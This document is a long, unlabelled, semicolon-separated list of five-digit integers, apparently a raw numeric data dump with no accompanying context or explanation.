25243;54390;27152;64883;18484;53848;34979;66205;17186;28866;19506;10532;36751;62088;26385;22436;22069;12767;24223;47463;30789;53175;11947;42528;25875;17154;48342;61315;60927;47694;65938;12110;30608;61416;15730;26024;62934;39338;34574;32917;30550;42803;30811;46011;61075;51394;66716;26103;43517;64053;64432;53965;51558;56713;61195;25021;35641;34721;57266;37216;42288;56874;51522;40749;50131;31913;27563;38695;35785;56399;51144;54049;11533;47183;26632;60391;55600;35357;46385;39889;50842;26236;57108;29569;48858;57384;38677;46469;29638;21841;20633;66749;66835;44621;64042;40636;49375;32487;61775;29661;55333;36193;30016;48464;52996;55923;22726;29810;60552;61873;60121;56201;26668;14665;29453;56875;20462;28625;38205;17146;53708;53650;17223;11090;66453;12973;32419;49849;14048;10987;35849;11254;43313;44717;38229;13210;22239;39946;26207;19801;16175;39697;15298;44147;28494;59129;12840;44074;27391;15235;34112;64852;10468;61511;15714;17682;46731;29190;49766;31266;61552;60125;19437;14895;24710;61597;22263;36144;38183;18820;60799;20077;12395;56223;32900;58807;15257;22855;56031;18236;18040;45490;13894;66070;17556;52537;22511;38485;45399;31761;54478;29737;33722;42088;36197;49331;35379;16789;22440;46305;40722;53085;50234;15267;20146;25050;27660;65224;59985;12486;18677;55131;34871;37934;45857;30617;53191;14555;54433;66712;58752;59655;46627;31334;26384;41216;53978;58352;56531;63448;24838;37785;21061;24707;22982;26364;26307;33869;15782;62132;33194;46526;47824;61180;59548;12831;16131;55614;39038;24499;64004;19546;48325;65956;61199;13194;25452;34207;46035;26502;65770;18551;44490;27887;48875;26667;21709;28046;46390;64013;32822;14841;36814;59971;63348;45514;16794;39059;62100;29192;15341;64918;12107;61913;24079;61504;14586;55494;20150;16214;22694;23307;14547;34914;34152;66738;56348;29450;56320;66517;45945;26657;43710;52563;46608;34763;49894;34975;12014;30449;40200;26144;63182;24084;60462;24927;10060;11315;58216;56583;37687;52355;24521;12566;21037;21958;48959;31303;14220;58865;34727;45009;55976;37344;59848;54839;52195;19286;44950;51004;11481;50191;38202;19241;29652;28890;64986;62945;21580;41791;38822;44227;35169;25443;22039;32090;31036;49983;62685;36535;37737;31529;22853;14400;29454;14156;21787;40339;39197;64492;66359;50142;49101;21041;30505;64813;63100;42761;25760;30781;18404;46899;54968;34226;20322;51088;27243;52436;19694;63513;26800;45898;47521;32093;17686;42894;60919;59256;36676;50392;41060;29113;21653;14702;56233;49855;31762;62885;41681;58334;20857;13445;16182;24113;24356;13237;43009;42473;46212;31196;11135;17576;55841;43621;64445;15059;44341;31134;61640;22584;51018;17138;21680;12909;62548;28770;60105;58262;50476;20710;59240;21797;32216;42904;45184;45851;57671;35012;65310;43697;24653;48255;26711;30161;45658;66306;33363;18042;56900;35819;26426;36516;60318;12529;42360;31906;53803;36723;65202;14946;19155;16260;66717;14830;60129;30132;17790;24519;37015;56344;49607;44059;12621;63087;42408;38469;25208;50500;13469;24023;16270;57814;14231;42712;45762;36284;55905;59616;18629;21008;63121;49657;36394;21572;33290;19127;53718;32516;14645;13353;36089;49010;65766;19879;57790;20575;16485;19455;41897;25256;40474;26768;51867;64256;39512;45352;15705;55648;38143;38357;54814;59234;55169;22746;55446;64584;64356;61087;24912;41095;56952;10186;25678;23986;50381;58764;52150;38896;34909;63485;34413;16115;39605;45788;35764;65936;51996;14148;59198;20698;46192;42710;63995;10953;36908;45687;28434;66150;34668;28342;44773;14576;15715;27773;18756;62413;27671;42388;34496;27239;56631;40210;63286;48708;61102;22606;19563;49922;11806;64607;37181;30423;27169;32529;20110;55857;24574;16477;44014;29760;54268;44369;20540;36749;60610;65206;19024;50920;23567;38870;44310;25714;46195;46793;13216;66535;43134;21957;25903;37292;50560;22799;39401;31591;31530;62617;20191;11265;21374;21616;13626;44080;57254;25442;26322;63474;51349;13669;44431;17747;53906;65503;56358;32932;51825;57137;55038;29676;41839;39203;24774;41396;53375;32309;21725;28787;66713;11361;27712;20619;56831;47493;20955;65247;16792;18509;13358;10165;31652;61406;40407;31924;63350;52261;60390;62261;53477;37244;26616;15181;31881;24191;25716;47501;61649;39846;21964;60636;14242;31895;25953;54896;65801;39211;37197;48611;65238;17443;64598;45835;62366;14389;42270;32253;55164;43597;32683;30419;43339;66230;17469;64088;12334;64943;58126;13522;38398;16158;18158;49167;24168;34843;47785;28162;27195;66847;51766;47743;61966;39343;51280;60201;52199;38359;22067;57909;26506;39389;49244;30387;31828;12753;50351;23931;19131;28365;16187;33614;61322;54188;47795;42197;10131;17614;30714;47235;56412;41882;28727;41971;21557;39804;11105;23632;16537;23935;66437;18235;32135;47492;20664;47750;33022;53494;61732;35527;38024;24861;36714;50155;16020;52797;61359;30306;44814;42391;57969;11900;30872;62806;13526;16017;40907;50060;55819;65775;54629;25927;61565;65103;12559;14564;41836;34340;48258;65146;64205;29670;20153;54785;24387;48842;31308;30871;63111;48406;30122;27980;50300;18625;20578;32147;38458;25886;29518;10342;20902;40717;64894;12442;25632;39949;22666;50895;48633;52871;51054;23345;25282;29269;25958;15285;11414;53970;52442;44739;62164;23973;62993;40776;26740;65807;49992;12676;37548;13468;20734;60764;19663;41654;39332;55898;58918;33576;41574;36344;10315;61807;46567;17411;37643;40073;66090;30241;12260;49354;58276;49092;23734;21838;28063;55554;23139;48341;32894;25801;56598;58384;40854;10281;50957;43823;39986;37131;23147;25663;63836;43167;12801;60309;11616;29455;46868;20693;15237;27277;23217;52941;63366;64290;65417;38788;47474;34973;53779;38175;17263;58474;61609;39642;50038;54898;45409;58615;35712;15908;55713;42343;34666;31313;63634;48757;62632;63644;58321;23546;42046;25638;56910;46191;19622;62068;41020;17381;13732;15694;32282;57372;39327;66710;42018;60029;38911;32450;18802;35956;10155;23382;37879;20060;22255;56117;66434;16461;23021;23029;16041;52061;21439;50162;33367;57703;46818;27126;45659;21566;49517;54813;10351;33116;12547;50606;65928;56314;23991;33204;31789;65736;49053;62845;51422;59131;26882;20378;47825;52228;45730;33096;54317;43314;42371;34834;34455;61635;51648;34474;48242;52520;58254;36177;61812;34438;66317;18511;23856;18576;45317;37599;12564;12816;53402;22806;59263;34297;34313;24476;59307;62893;49716;42427;19400;62483;56246;36233;25288;31806;66143;48423;30120;59242;65620;64237;44093;57519;42566;46123;38991;38799;26613;21080;50522;42565;47339;58997;23039;23425;55871;28785;13679;29830;41881;20332;46095;42636;58447;54008;25661;18725;50682;43221;49080;58907;51712;48799;46754;34693;14898;10309;31815;41622;28843;50627;32456;29773;28403;18020;21741;22681;46710;46233;53941;33228;53648;61519;66637;34269;42366;21690;57963;45854;25480;52373;65954;55703;15273;25883;38056;10918;25228;30277;18356;58585;35456;64239;61503;56740;56039;37892;11169;61418;49378;30036;42702;29650;27247;13662;11940;39404;64765;37808;54982;31011;46549;19157;40204;63090;58141;48673;38743;16039;43644;48395;23964;59775;51259;35124;54424;52325;19244;33965;19402;50809;39903;60161;31281;27112;33557;23694;16757;54951;52210;51835;14412;49062;64197;56867;63362;31501;65856;56003;12895;64362;56832;47289;48240;50539;61409;59423;58911;32539;10202;44732;24410;49912;33153;13060;24116;13339;60902;64327;65522;31685;23099;58180;61918;44193;50457;25066;49915;60196;17558;59099;13396;22383;39490;55867;63537;53235;45254;16174;33739;16089;13854;65414;63284;33600;39929;13848;45802;61065;21395;21663;56042;13390;36019;34487;35451;14398;20552;31116;53497;35296;18296;62347;43860;54398;61125;49800;52935;11942;32226;41226;28609;32557;49546;33727;54501;61745;59200;39654;53308;24231;26621;13076;11354;30628;36134;22765;45062;22501;17017;56257;12028;52515;20283;25057;24227;14307;19275;43685;54965;61644;17473;39906;55149;43959;22099;23756;37151;18611;65398;34169;36453;25019;25177;11167;23531;14575;40866;24365;49946;41303;57846;22253;64982;22199;39029;22432;55362;34432;62193;50812;14017;16708;11837;55539;53798;59260;63783;64202;65579;66316;66821;58780;41371;25989;20775;55487;42725;17607;52561;18375;40850;48919;16526;64785;62383;36142;43595;42384;53305;52799;28973;54148;65886;53247;60933;26354;47215;27296;20424;31184;50028;37526;21115;31119;32661;16547;52200;65448;52834;48495;56273;39806;57452;40426;31261;44811;15221;53086;36221;27621;21945;42002;59011;44697;28156;49161;43319;56959;57398;33092;49206;11281;45226;42128;26096;19086;53772;64430;39659;19366;43592;28818;31607;58990;44478;59046;12890;53009;58654;37767;14540;23016;53332;33438;58839;19172;63944;54855;28149;39177;35266;48145;39895;12347;23783;48289;23984;27882;56617;14789;24260;41816;32897;25837;31680;66318;10343;53856;40460;64395;37820;48353;11560;38217;38431;18516;49118;55667;22150;43194;63228;10187;61652;17394;59609;27529;56950;36011;57090;30297;27694;58440;48980;47684;13823;55209;43863;20742;19854;46030;11522;58205;65260;18969;32153;50599;10612;41249;65158;58146;60788;49899;21182;16672;13030;18861;58142;47343;14167;49650;30354;57873;10831;54667;36728;33919;20200;43499;64087;29582;64207;62245;11482;30382;44492;42849;42328;59233;51319;61932;25254;38468;28163;35894;65943;43922;53546;32865;65073;11061;35411;17200;33360;25890;47726;15022;46161;47582;37412;57256;31195;43238;21495;64534;23406;31551;44702;46673;64323;56894;48925;53461;64067;44520;43465;21047;23917;14251;18931;39376;65797;55606;65372;59725;62377;40446;22741;28826;12927;21730;65113;45069;13122;16178;45149;43630;38022;59057;29909;25247;55223;11983;57705;14431;47010;34065;13804;29511;24542;17390;45140;31383;65734;44913;48710;54671;50629;35994;40119;20118;57521;57199;51150;12117;28917;28062;22926;65137;60160;63425;59619;52453;52710;30540;18043;35801;62568;40227;45794;66251;28697;54732;28932;62710;64399;13140;64854;57043;39926;29706;36230;48961;10928;15956;12368;44089;65225;20483;27866;49435;37294;46432;31887;46991;55585;34895;52804;53138;34729;49985;63578;27663;41405;13415;26804;44361;23046;16582;31715;25462;19828;21672;56342;42975;17598;40498;66062;57966;19851;26604;26662;44397;46270;16823;53342;19452;33369;14458;23515;14448;59313;27546;42783;64341;39515;65363;18566;39173;55831;45154;10777;14050;38904;31763;62304;19185;20784;49031;41528;54303;28498;63300;18024;37784;56083;60087;55454;30568;39870;47442;25792;34342;41939;63065;11842;51073;26748;45869;38759;28389;32804;55132;34799;47483;15188;14729;34245;49008;52496;51465;16426;26572;48430;64885;66642;57950;30293;25957;46988;50609;18917;51277;42988;26663;13648;35561;64786;41955;11660;59494;30309;35237;42289;49240;51637;28704;15198;32370;10797;15027;48816;24091;65545;51007;60980;27687;62659;60346;19836;11433;31197;20009;64740;27589;52042;42578;30961;40321;20512;42350;19472;52078;42333;38733;15658;13421;34236;11990;59190;47344;57222;26672;58279;30078;33651;52265;19631;30321;22389;66193;39276;23375;17425;21847;30490;41132;65694;13660;56599;61586;13476;42507;61819;20728;20388;21970;48413;10674;58677;21067;64985;50430;34590;28397;58916;54432;40261;17454;57837;25327;53022;46725;35844;42909;16952;34952;50615;20253;29434;35471;31489;63593;18752;15655;57861;45401;11875;30486;40221;30447;60355;62295;18190;47045;63308;18642;11003;45418;47745;25655;55265;11142;59830;58290;27945;11196;64995;64888;26183;46656;39181;11712;56022;20898;43504;27459;27015;46414;37132;23614;55850;24165;38933;40509;41551;29869;66154;60601;60844;51702;18316;45179;60750;17698;53339;63311;51340;37465;16157;43693;40046;11674;60943;42627;39992;32755;36963;62447;43330;65941;41135;62830;19204;40792;54962;41820;24880;26041;62788;55106;42045;56700;34976;41326;30671;12997;53859;34030;18247;46645;56720;65101;28553;13416;23648;20909;56484;29244;45263;40005;59314;48780;50361;32459;52028;64499;54992;55624;10686;16114;21640;11744;32003;35551;31131;54464;43118;45845;66072;19294;64818;27542;10074;63912;16337;26681;12258;44587;28137;54647;39777;57065;28449;57397;31333;32920;44311;25784;63186;61946;57195;41786;33565;14769;32801;36057;21997;63524;56143;20277;49693;53087;56118;40919;58397;25961;28631;54156;42611;53125;21558;14149;36817;61801;31786;63246;11811;25240;26517;38992;26042;56983;22405;51258;55513;62962;66187;45079;53740;28338;31096;52164;31420;47017;37632;44184;27373;10641;39759;38761;12039;58628;29772;37378;42081;29660;32595;64375;34891;45453;15039;51421;59719;19238;45432;64887;25567;44819;27001;60445;63881;63329;54211;23533;65011;43943;33427;15406;56669;65427;32707;45693;25928;33905;62243;18206;48675;59271;62367;35812;32662;61454;10257;41924;40480;27407;51756;58326;20534;15203;43837;35822;45689;55895;27504;21988;65981;63892;34275;66745;27292;10480;45663;51957;39735;16225;42721;36954;57438;25439;36583;15947;62839;59512;42757;34685;11787;15522;52209;51912;29010;22409;58905;58699;28993;55435;39687;36180;63359;34996;55453;15880;62798;32473;44598;51013;38856;14140;51664;17753;26698;10870;11581;30311;40815;66530;44546;13177;31391;17992;23140;61799;25713;30266;22397;22682;14947;29011;53677;60273;27832;36255;58415;46315;37588;57753;18517;41530;57247;61992;16473;26259;49098;40041;52126;39260;39933;42830;56056;41005;61877;59966;59407;34532;55818;49910;45960;41099;38289;63607;11266;49745;31947;10327;19625;18387;32856;16891;33660;26633;46474;11556;63041;14473;31730;39187;44239;47337;16727;34596;62402;52395;44594;35984;24726;54938;44051;65792;12999;51981;61516;34113;16341;44159;24947;21015;45686;20752;47367;26388;59327;26614;58846;41034;38810;51636;36007;38769;43957;47649;23148;14525;32769;55051;48997;54682;50714;57569;34252;50168;30053;50519;40236;19519;39387;18394;24439;44889;36086;37883;53890;62136;22894;27640;54357;57253;29724;62822;22851;65999;23989;66381;38727;11557;18118;48391;62327;42294;17628;49463;56354;47299;34558;13426;34901;13973;21119;34573;29472;49792;48749;15460;43682;50477;63431;60945;51705;15713;66459;13623;49924;39950;32844;29107;39079;36139;32759;31827;16647;57796;50425;25322;46194;32725;33770;13110;61555;20694;58857;30929;64183;20849;29626;37667;11067;23615;32944;39058;40923;23849;65696;58345;63149;62744;54194;54881;21352;59207;58426;50646;38263;34517;22342;12853;23837;65080;66293;44144;44491;64281;65535;61904;60164;43141;18259;59231;44612;42993;10600;55107;39412;24300;26405;66522;60118;29623;22634;27103;52997;14100;42232;18624;64172;58004;44259;64874;10910;48581;30197;56829;44280;39292;57017;44512;40905;43807;15040;29111;37194;53340;58637;28812;60968;36718;19805;61737;62675;42976;23253;33072;61156;24781;12929;40877;38044;61480;65203;38629;14347;39647;11283;11574;23577;44797;58396;21621;19339;63771;50653;26994;49082;53695;22156;40829;61426;49355;35885;48158;38060;57988;31874;34672;64145;26241;27080;21346;33283;16318;65059;35173;41516;30109;24659;39118;26896;37085;49430;31368;52148;47230;61278;42552;38078;64038;38422;17757;28669;28307;64709;15303;62741;45585;58023;43119;15372;40315;66863;16268;29678;39370;24028;41130;31582;58740;41893;28509;19827;47037;26774;30758;22878;22887;40605;12104;17668;20673;58659;45740;43871;63924;12981;47734;14874;62131;65102;40973;60230;16749;20355;30979;24978;59630;44870;53682;27369;25707;12935;35045;26336;63898;14241;25651;31889;15042;16768;56537;39860;46866;16914;42392;14146;46380;23202;30009;60085;36149;14524;29348;13991;58330;30017;34520;37469;24955;56440;54144;43213;29102;39708;28734;59248;10858;40447;54733;29002;54569;65931;65133;27213;19379;14561;21707;32126;17033;28543;47068;31660;32644;41821;46136;64028;57847;45457;17973;66010;42279;32609;48474;27394;43866;57798;39114;50260;18724;53420;31598;50452;13725;64702;45580;58048;50938;28099;35094;53531;26300;55738;18567;10479;27717;62851;23294;40340;55853;51459;60040;45712;44077;50883;29420;31215;49041;55224;38122;56323;15274;36956;14105;64003;57057;34489;40577;11689;37532;45676;56683;61931;33913;31785;35929;55496;57558;26045;47465;55881;24921;50536;55278;48147;27772;24250;30346;34483;28349;13470;25842;39236;20065;33851;12579;40412;59577;63483;50954;64862;28435;40998;26603;56623;55801;61636;59592;30574;63369;61243;39577;29045;18320;25460;55377;61030;17075;43749;36677;62628;14057;50720;14651;35768;57173;18942;25601;24503;41128;44677;48995;45598;56379;16846;51148;59194;40580;43165;47593;14725;47489;37518;30757;58965;16038;33736;34272;46128;26927;32145;33924;31623;11379;18061;45431;13552;61827;15557;47079;33135;38185;50382;20000;20185;29395;61443;49570;49191;25891;31088;43748;46215;57165;16076;11691;24374;61316;49801;18100;31039;30884;62260;35828;10904;27478;39155;54367;40228;30804;61337;43907;17560;21615;22605;38935;48964;29510;31346;65923;28958;47274;14815;38790;12888;56538;15991;47082;26601;48871;18324;39910;63928;35486;54777;40290;13209;15826;16559;54668;66567;30416;11568;13203;51456;54107;52279;60036;59028;16838;57511;64216;36807;36335;23518;60102;49893;16021;15514;55719;46564;27220;13488;13766;60958;32659;52005;11017;62351;51037;65110;65680;52407;60782;13150;29858;15643;11453;29758;36763;15488;31038;13757;62692;57627;38795;36298;44202;54466;51795;16877;13599;47129;52895;11863;36249;44244;19398;53657;60079;52579;66052;18808;16785;38874;42653;13796;26631;52985;43287;51794;26911;46457;54985;16630;23678;36186;51436;41304;65187;29490;52138;12068;40102;56081;24556;59324;11880;41504;20901;40575;42514;17306;57559;22892;35789;17418;62808;10190;50263;56095;53224;49070;25201;55041;52462;65828;39241;61386;53038;58810;40499;25441;45171;48569;60595;10669;30782;50988;62004;39740;52827;43251;27949;14890;29127;63658;65643;18575;54885;30468;33267;37639;43795;63468;60632;42753;13783;56872;36081;47834;31628;56362;26398;26921;46085;44592;32362;34025;38465;42679;59466;37649;35358;58704;64567;64845;32384;31075;46310;53157;56483;56856;53433;59517;20287;39507;19877;36691;13524;58380;25478;50440;46179;28287;59333;29734;28955;59855;16132;45908;46734;32298;48307;44021;16478;35301;38948;15786;18130;16968;34735;60424;65237;20572;45312;33339;53351;20867;27178;30391;11073;39920;47227;50257;10310;51250;65484;62039;34345;17752;37585;31301;49479;45491;17478;36075;10931;26304;53621;46668;18155;35120;54578;65706;19741;61473;31159;57481;32792;11768;22832;22229;12635;14864;23210;25309;61663;57925;60523;33525;12697;48334;41245;18593;42929;36700;40583;58945;60754;57660;59550;28071;20501;10136;46517;34390;65730;12106;19324;39595;20913;21971;66288;65549;39427;50297;58139;40780;36536;11852;66599;63405;62440;61466;55445;50313;28470;13587;64802;52763;63653;47755;17019;36122;46301;39112;54924;46830;15199;64304;31615;63896;12307;59981;26626;26851;26936;32925;43995;53801;16889;25224;21812;61668;49258;36474;22003;35074;59576;30815;38323;63481;51468;12267;35193;55873;11263;15579;17771;18750;64793;54481;59617;32770;22476;35204;35387;18759;65217;42868;17977;37098;31126;20514;22510;63109;57688;21655;62404;33453;33901;57495;66117;40726;44332;24504;13231;30224;63627;52197;29385;25307;64881;49497;63385;47566;63318;15256;61542;23428;61267;49377;44476;56147;15973;21508;38977;23988;16269;18893;57000;63811;30882;13598;48585;24894;53879;66507;14077;13454;35103;18253;26192;34136;54560;62952;21227;66305;28455;50242;59054;32103;14806;19953;25973;52541;37174;13019;38362;31080;29635;13398;40842;12474;11879;50089;22080;38433;66083;17537;36631;40356;32652;32426;58337;55897;66817;43824;65976;37327;48924;47514;55148;63621;48192;43737;46512;25153;16561;57012;66382;24696;65409;46807;18461;43533;15570;22045;63678;39395;45343;57005;34665;35783;16499;54185;35128;60655;11306;51031;19948;40632;31394;33431;31103;48615;12802;12400;39844;40556;15842;64801;49469;28295;54714;22812;28888;54163;49579;10174;37255;66895;55714;11870;28909;27447;12716;56508;66583;11240;25506;18830;56207;12271;58433;35291;43515;22471;23333;42409;35344;54333;59518;45353;10075;21149;25332;25448;37971;22388;37054;41690;40892;15158;56962;48494;25782;62843;40192;16862;29034;66457;25694;40679;29403;60476;65659;61620;29722;65024;13097;12990;61689;15598;41994;18315;49239;61295;65369;41910;16978;58081;28753;63713;52711;29705;19061;15318;20084;19130;56801;16991;14737;29389;18856;53606;56250;47686;22173;25843;41101;33680;16925;63058;59549;41234;48720;33210;28703;59986;56934;33234;30511;61250;51611;63312;45856;47329;58759;39998;33361;27952;44216;27177;25356;17591;61347;62943;60089;46672;62994;40549;40051;24755;19327;29669;27915;28060;18508;30025;18028;18913;13665;36565;23378;26790;32743;48883;23239;25092;53210;11932;45556;22729;20193;16974;47899;26508;15939;20350;35407;57342;58956;29446;40795;41845;26717;14814;20874;22490;17779;35226;42481;55459;23683;39909;16843;13359;32281;50435;49525;27693;48896;30771;55506;10866;14500;30876;36740;47596;17827;28892;17574;30512;38423;37762;50493;54445;25709;37498;37064;41266;16422;66508;28859;10286;27430;38228;26372;47642;66389;13591;66480;40475;28915;46803;59018;66718;38909;42118;43616;14734;48434;16353;13684;26119;20801;64541;32297;49782;22922;45082;13225;24730;59552;25118;46201;32941;42755;38960;23495;51603;36991;26483;54848;40021;41747;34334;23977;37947;40798;58161;21453;54081;31965;51370;39200;35290;20855;54350;34090;26948;49958;36637;15369;25379;45445;62170;52424;15062;45956;43244;60627;39090;53099;51851;63053;18464;52490;17378;15895;11145;34759;40439;65235;38702;22583;41144;44473;14472;21161;66854;50577;18908;58283;24094;61323;60133;64733;15616;17460;28493;16811;45840;64759;15662;23644;59472;17319;29093;29308;64515;11040;47192;25533;52570;35071;60963;53882;22459;32660;64328;29188;63223;42432;46388;40007;16503;51531;43276;64742;66258;42767;49969;42451;15507;23000;51145;20313;35615;19418;47127;58631;25170;31748;16448;38102;42265;24637;15184;41000;14577;52933;23163;44115;26417;59897;34321;32509;55971;29489;64864;51806;18529;63083;45141;18766;17045;61034;22842;54053;30237;34039;10611;39650;32500;61408;24944;66185;64070;14578;41822;39474;20219;44701;38126;13849;33142;14133;25086;48761;13244;47077;34446;23354;55623;40546;49034;24841;38002;45874;21490;39086;28968;54954;30186;16867;26341;10576;28971;18222;59673;62450;21433;14879;38434;32257;57050;23049;31110;31499;54386;12617;33103;51437;65809;59602;25720;42942;29577;32709;21851;65171;15386;55955;43778;26920;14791;39827;57136;59565;46624;51647;20870;26149;61458;44230;34449;12200;61355;40214;47432;14388;14358;51368;52217;40121;19695;57180;63005;19532;15788;65424;10606;10691;22566;42319;30646;65812;27662;36592;22673;18466;54161;13748;18585;38707;19054;37694;17581;53455;20860;63676;45897;64344;61398;63738;55192;38463;30487;21044;20868;21552;39937;30359;44064;17497;32716;43855;61615;36291;64325;14072;18141;18410;45210;40274;15990;64873;13557;10064;57181;46975;53428;61084;33094;49145;42285;10463;39972;12483;45827;24323;31835;50755;18581;24369;42802;19315;14955;17719;44199;35855;32367;44779;45829;64803;44384;38611;15258;63815;39878;31781;43858;33258;26551;19048;39594;65817;30228;42719;61750;54699;37026;57016;53416;40587;24667;46464;53975;59042;65929;28110;10977;51408;63577;35647;26725;59467;20631;45318;36130;23525;39678;40730;30594;64166;38079;24562;14961;14870;15432;51537;62684;53790;49675;36520;63840;23043;52321;47423;50741;13949;48604;19006;50408;27496;42470;46726;19732;22376;21019;28368;48837;14869;53500;65808;61588;43001;58760;18051;62150;26330;65695;11596;28596;65189;44372;60776;59342;50034;30068;25329;40161;51670;47196;28885;31833;46151;39630;26924;51815;32552;26176;21194;38739;22596;40287;47641;14496;23410;57794;14775;10758;31030;12704;66547;65313;63154;38572;28369;29984;65870;48375;59809;16903;57999;35554;26234;41407;13038;33238;45272;32888;54313;55212;59295;13035;18672;34018;41476;61971;17626;62074;22609;13473;43711;11512;49188;40677;39761;25396;65750;64745;18870;25675;18270;41734;45465;27859;40078;32756;32215;49019;18676;43645;27497;15581;10998;60555;60826;12926;14602;31322;37522;42774;12582;60128;23583;16860;66852;13450;15412;19857;58102;21117;60308;35473;41041;47171;27619;46382;12513;58946;12344;36494;19572;19212;32997;64713;35479;22341;21525;21278;34746;31546;19733;21978;59116;10409;30606;57781;38514;30722;12950;42935;33876;11310;63386;46097;60347;19413;35535;24016;24632;50437;25529;40855;24950;59605;33380;63376;27119;24903;19075;64416;15625;54216;64753;43247;38116;59202;35545;29809;19735;24033;62364;49936;45320;28511;47110;40238;55804;46147;19399;15186;43337;50855;46544;51107;15176;55237;63917;19526;56807;52327;60500;56692;63373;18975;33558;14024;48304;55541;22544;20052;24727;33230;47567;34037;34235;57288;18636;34425;49262;29283;52038;48555;60502;58835;52063;49056;62903;21204;12044;54854;32970;45641;24925;42164;12830;51797;66620;35630;34214;41672;62376;48909;50611;21103;65458;34010;51346;52728;30427;10258;50732;13891;28238;45843;20465;51240;45951;54099;58848;57887;21526;40247;36096;54452;16395;17196;56211;36730;63402;60418;33980;27697;10300;55206;20692;31689;30244;28387;64678;24133;26869;37448;30579;65249;61988;34531;14766;65275;38392;63055;34637;31378;26248;32199;34960;60775;16441;59621;34477;57944;50157;65721;56949;34172;49315;66208;20223;22435;47027;20675;24371;62269;47346;41568;15394;35696;24350;52988;48740;20211;61150;12544;13279;23398;49114;10619;27661;52008;13012;57153;38380;19653;11675;62266;66683;50585;16986;22793;11975;45895;41173;41619;44094;20415;36568;49219;54536;61090;58422;40959;59711;10557;45889;48619;24859;22134;10502;62434;57693;57694;50887;20998;57102;49816;25384;40403;21279;48211;62728;47180;19513;32256;36874;26946;20164;35373;54353;18431;16192;25343;28870;64966;59541;65655;55737;30873;22822;17706;37844;15963;53698;55961;26503;14840;33765;35949;21872;61618;55367;61880;64502;64369;55338;23966;16884;22754;15639;47303;14682;27652;25808;22293;24172;18142;66654;26721;20590;40675;38407;37558;28581;56626;39652;19964;36878;29245;32214;44675;61603;50623;46507;53746;55566;50554;33359;17093;11966;30327;35321;43783;36909;19497;35068;53762;15339;65570;49531;29791;56520;26651;17206;61699;43762;31267;19999;14910;42180;32136;44188;24249;35430;66699;45571;50734;46772;29687;51039;62689;30337;61400;27909;58053;57261;42531;52796;11727;14393;14253;18646;26434;21450;48156;47531;52759;12798;26468;51605;49342;59337;18420;45814;43229;12501;26378;46399;54371;25706;51656;36680;26061;13508;17567;44511;32846;16130;43258;38604;62219;15719;10817;36629;51805;66845;18647;44295;22954;62195;41571;47774;35313;23642;10821;45386;27698;55607;40068;54327;29142;42394;11794;33428;20921;57597;11056;56791;63212;20407;14208;49055;45837;48756;30803;19371;13441;24312;17802;27727;58065;29220;56861;45275;40345;66161;11109;60976;66347;43675;27854;20298;41322;30522;37153;52435;31373;66302;49809;44297;35316;57047;46415;17568;66670;59328;41768;54892;57076;36440;17141;28699;63470;37889;54437;61018;37967;36107;62127;54100;64594;29868;14493;30051;63897;38825;54137;36491;63531;58157;27367;43875;65622;23902;22651;53067;11162;19149;65254;11291;56879;47780;66961;10569;11549;34809;33605;36064;38318;52872;45875;51440;35076;32231;18134;12479;24892;36526;57008;50917;33627;60999;59943;31487;14696;27457;17651;20374;52572;20893;25255;47731;18736;21976;10489;11277;52301;27421;40123;44572;14527;43981;13517;61518;16982;41495;35462;52734;30399;50244;30388;46547;30937;11800;10590;63693;63843;18578;66460;23766;29776;47779;32705;25598;57557;50800;19776;56999;65322;47157;48278;48526;12889;45415;63033;21461;44475;13103;31175;57049;28180;43781;54928;13959;11437;54611;38669;38858;60320;46072;30951;17005;47371;49478;36148;43613;57577;13017;48527;46890;16993;56702;55502;65160;33912;25930;55675;58718;65061;38479;31404;43962;49374;29679;41447;31358;66580;33494;13121;21738;65314;49492;34280;50121;30898;57248;66385;65473;32421;63583;19515;49518;10683;49243;39724;20302;45644;24038;24158;56374;30593;66748;15844;25130;54907;34060;19246;16141;37032;65300;28002;39538;32422;27805;61781;36918;66689;57034;17750;54988;16365;61899;32065;66103;55933;24693;60350;47420;17751;17392;32498;39115;20861;32051;40783;49476;22212;27200;60747;12762;24272;33831;37277;46112;21760;33293;64415;60091;43472;35960;29754;23774;14887;66223;65786;45993;39709;59938;14452;21087;11797;42948;20308;56478;56643;57725;17714;43683;65724;41314;14678;10415;50475;46155;51532;12832;55548;40704;11404;49820;19342;38774;62575;19243;50491;13020;18638;16716;46091;16621;15349;43283;25513;22414;52669;36885;52320;62297;40273;44589;16906;29634;20029;19749;34292;12706;41434;34825;12492;38665;15475;46342;20543;34355;60006;18002;21511;59306;50438;29330;30230;39505;33459;55886;51746;51106;55085;39897;18719;11047;54618;57717;34284;48238;53119;36600;35762;34163;12385;16959;15868;42158;20423;33824;17449;18977;34247;56811;19699;38959;53685;66093;37339;26200;64485;23421;57752;63411;58183;36422;19195;22791;60002;66789;63208;31922;45834;20160;27928;48681;14873;26868;41323;54895;21852;16407;16551;44284;57792;66075;49260;57617;49769;19927;36211;58028;38598;47185;31699;61255;24120;64002;35921;24818;59825;19510;65994;19095;41867;15114;56139;65930;48860;65778;63492;36478;29421;44577;39421;15888;41958;45988;18851;63650;20023;10156;47456;64622;36855;46065;24514;29424;46343;45434;29323;23672;25852;50908;17220;26512;41068;19417;27004;22232;27648;48150;47054;15063;47505;12420;56135;63178;65569;56033;42254;34756;59448;56271;34454;51822;11182;53948;31590;60003;15831;64773;19458;11614;52420;53355;24375;32898;63834;63703;64419;26470;28872;59551;33524;60456;58052;24630;35116;19674;46822;62152;25741;31776;19428;32200;63392;66697;33074;53353;33161;33152;28731;20880;28538;52841;11590;38018;55448;55855;41115;45020;17187;53431;63617;26620;16283;59192;36252;51288;28707;48365;38472;51544;63156;16409;37222;22352;21271;23778;44201;60100;50401;35323;60522;23442;61916;25313;18350;22393;37322;36665;18541;41087;50649;50230;39616;62045;49655;24672;55822;12280;17170;24889;59669;60646;65140;13799;53280;45691;66904;65907;12072;32345;24308;31176;66569;59735;27405;48323;17265;19176;54886;26648;14975;17720;16037;57087;31845;43477;33271;29595;15720;18671;31970;17167;56052;49065;39711;58095;15912;21324;14661;25116;10811;52376;24002;58877;25897;34223;33683;65199;11421;10410;39339;58189;22857;25998;44725;25101;51161;25115;40543;52589;27353;35773;56337;20467;57309;66796;48283;65504;17095;58158;20319;33528;58757;22007;15490;64893;63865;18741;27853;63450;38886;51568;58841;63014;38749;64859;52329;47416;31068;40761;22044;29704;38213;11194;15527;28188;14411;12343;13048;58110;49768;11808;11609;63770;44907;47106;13089;61817;42622;20256;16034;61133;50139;52037;46616;27820;48151;15837;41431;31396;33681;10915;35502;16644;38835;40388;36433;61015;13853;43248;39633;25122;65768;54914;16332;58453;14182;14808;22348;59970;59060;33412;